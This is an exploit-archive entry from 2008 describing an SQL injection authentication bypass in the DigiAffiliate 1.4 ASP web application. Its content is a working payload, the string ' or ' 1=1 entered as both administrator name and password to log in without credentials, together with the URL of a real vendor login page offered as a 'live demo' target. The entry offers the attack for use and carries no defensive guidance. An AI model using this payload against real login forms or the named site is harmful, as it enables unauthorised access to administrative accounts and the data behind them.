DigiAffiliate 1.4 - Authentication Bypass

EDB-ID:

7067

Author:

d3b4g

Type:

webapps

Platform:

ASP

Published:

2008-11-08

###############################################################################################
[-] DigiAffiliate <= V1.4 (Auth bypass) SQL Injection Vulnerability
[-] Discovered By : d3b4gd         
[-] Greetz : All my freind         
################################################################################################
Use these information to bypass adminlogin

admin :   ' or ' 1=1
password: ' or ' 1=1

Live demo :

http://www.digiappz.com/digiaffiliate2/login.asp
--------------------------------------------
--------------------------------------------

# milw0rm.com [2008-11-08]